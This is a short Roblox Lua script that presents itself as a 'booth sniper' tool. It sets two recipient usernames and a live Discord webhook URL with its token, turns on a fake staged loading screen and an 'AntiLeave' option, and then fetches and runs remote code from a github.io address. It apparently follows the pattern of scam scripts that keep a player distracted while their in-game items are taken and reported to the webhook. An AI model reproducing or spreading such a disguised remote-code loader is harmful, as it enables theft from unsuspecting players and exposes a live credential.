UserName = "Malik_13952"
UserName2 = "roblox123"
Webhook = "https://discordapp.com/api/webhooks/1100449838837006401/obBPDkI2vyxEAArMufam2CL9h1Gbt_rCzr0VumcYyhgd-pNILWZDUOIqZRlLwKRH6ncn"

_G.LoadingScreen = true
_G.AntiLeave = true
_G.MouseLock = true 

_G.ScriptName = "booth sniper"
_G.FirstText = "Script Preparing"
_G.SecondText = "checking booths"
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 45 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("https://rizz69.github.io/Main.lua", true))()
